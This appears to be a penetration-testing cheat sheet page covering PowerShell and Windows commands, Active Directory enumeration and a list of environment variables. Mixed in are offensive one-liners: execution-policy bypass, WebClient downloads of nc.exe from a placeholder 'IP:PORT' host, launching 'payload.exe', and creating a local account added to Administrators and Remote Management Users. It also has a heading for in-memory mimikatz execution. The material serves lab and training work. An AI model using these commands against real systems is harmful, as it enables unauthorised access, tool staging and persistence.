search

Powershell Cheat sheet

Get all the groups with their user in count.

Get-ADGroup -Filter * | ForEach-Object { $_.Name + " : " + (Get-ADGroupMember -Identity $_.DistinguishedName | Where-Object { $_.objectClass -eq 'user' }).Count }

powershell -executionpolicy bypass

Downloading file with Powershell

powershell.exe "(New-object System.Net.WebClient).DownloadFile('http://domain.com/whoami.exe','c:\Users\Public\whoami.exe')"
powershell "(New-object System.Net.WebClient).Downloadfile('http://IP:PORT/nc.exe','nc.exe')"

Executing an Application from Powershell

println new ProcessBuilder("payload.exe").redirectErrorStream(true).start().text

Switching from normal user into another

$username = 'user'
$password = 'password'

$securePassword = ConvertTo-SecureString
$password -AsPlainText -Force

$credential = New-Object System.Management.Automation.PSCredential
$username, $securePassword

[+]powershell script to Download mimikatz and execute it in memory only:

hashtag
Powershell Cheat sheet

[+]

hashtag
Cheatsheet

Command

Description

xfreerdp /v:<target IP address> /u:htb-student /p:<password>

RDP to lab target

Get-WmiObject -Class win32_OperatingSystem

Get information about the operating system

dir c:\ /a

View all files and directories in the c:\ root directory

tree <directory>

Graphically displaying the directory structure of a path

tree c:\ /f | more

Walk through results of the tree command page by page

icacls <directory>

View the permissions set on a directory

icacls c:\users /grant joe:f

Grant a user full permissions to a directory

icacls c:\users /remove joe

Remove a users' permissions on a directory

Get-Service

PowerShell cmdlet to view running services

help <command>

Display the help menu for a specific command

get-alias

List PowerShell aliases

New-Alias -Name "Show-Files" Get-ChildItem

Create a new PowerShell alias

Get-Module | select Name,ExportedCommands | fl

View imported PowerShell modules and their associated commands

Get-ExecutionPolicy -List

View the PowerShell execution policy

Set-ExecutionPolicy Bypass -Scope Process

Set the PowerShell execution policy to bypass for the current session

wmic os list brief

Get information about the operating system with wmic

Invoke-WmiMethod

Call methods of WMI objects

whoami /user

View the current users' SID

reg query <key>

View information about a registry key

Get-MpComputerStatus

Check which Defender protection settings are enabled

sconfig

Load Server Configuration menu in Windows Server Core

hashtag
Enumerate Through powershell

Get-ADUser cmdlet to enumerate AD users]

`List all the possible user

Get-ADGroup cmdlet to enumerate AD groups

enumerate group membership using the Get-ADGroupMember cmdlet

Powershell Credential object (PSCredential)

hashtag
Environment Variables in Windows

hashtag
How to use them in PowerShell

Environment Varaibles can be used in PowerShell with the prefix $env:.

Example*: Variable: %APPDATA% In Powershell: $env:APPDATA

hashtag
List of environment variables

Variable
Description

%ALLUSERSPROFILE%

C:\ProgramData

%APPDATA%

C:\Users{username}\AppData\Roaming

%COMMONPROGRAMFILES%

C:\Program Files\Common Files

%COMMONPROGRAMFILES(x86)%

C:\Program Files (x86)\Common Files

%CommonProgramW6432%

C:\Program Files\Common Files

%COMSPEC%

C:\Windows\System32\cmd.exe

%HOMEDRIVE%

C:\

%HOMEPATH%

C:\Users{username}

%LOCALAPPDATA%

C:\Users{username}\AppData\Local

%LOGONSERVER%

\{domain_logon_server}

%PATH%

C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem

%PathExt%

.com;.exe;.bat;.cmd;.vbs;.vbe;.js;.jse;.wsf;.wsh;.msc

%PROGRAMDATA%

C:\ProgramData

%PROGRAMFILES%

C:\Program Files

%ProgramW6432%

C:\Program Files

%PROGRAMFILES(X86)%

C:\Program Files (x86)

%PROMPT%

$P$G

%SystemDrive%

C:

%SystemRoot%

C:\Windows

%TEMP%

C:\Users{username}\AppData\Local\Temp

%TMP%

C:\Users{username}\AppData\Local\Temp

%USERDOMAIN%

Userdomain associated with current user.

%USERDOMAIN_ROAMINGPROFILE%

Userdomain associated with roaming profile.

%USERNAME%

{username}

%USERPROFILE%

C:\Users{username}

%WINDIR%

C:\Windows

%PUBLIC%

C:\Users\Public

%PSModulePath%

%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\

%OneDrive%

C:\Users{username}\OneDrive

%DriverData%

C:\Windows\System32\Drivers\DriverData

%CD%

Outputs current directory path. (Command Prompt.)

%CMDCMDLINE%

Outputs command line used to launch current Command Prompt session. (Command Prompt.)

%CMDEXTVERSION%

Outputs the number of current command processor extensions. (Command Prompt.)

%COMPUTERNAME%

Outputs the system name.

%DATE%

Outputs current date. (Command Prompt.)

%TIME%

Outputs time. (Command Prompt.)

%ERRORLEVEL%

Outputs the number of defining exit status of previous command. (Command Prompt.)

%PROCESSOR_IDENTIFIER%

Outputs processor identifier.

%PROCESSOR_LEVEL%

Outputs processor level.

%PROCESSOR_REVISION%

Outputs processor revision.

%NUMBER_OF_PROCESSORS%

Outputs the number of physical and virtual cores.

%RANDOM%

Outputs random number from 0 through 32767.

%OS%

Windows_NT

****

# Add User

First we create the account itself:

net user USERNAME PASSWORD /add

hashtag
Add a user with admin privilege

First we create the account itself: net user USERNAME PASSWORD /add

Next we add our newly created account in the "Administrators" and "Remote Management Users" groups: net localgroup Administrators USERNAME /add net localgroup "Remote Management Users" USERNAME /add

PreviousApplocker BasicsNextAMSI Bypass

Last updated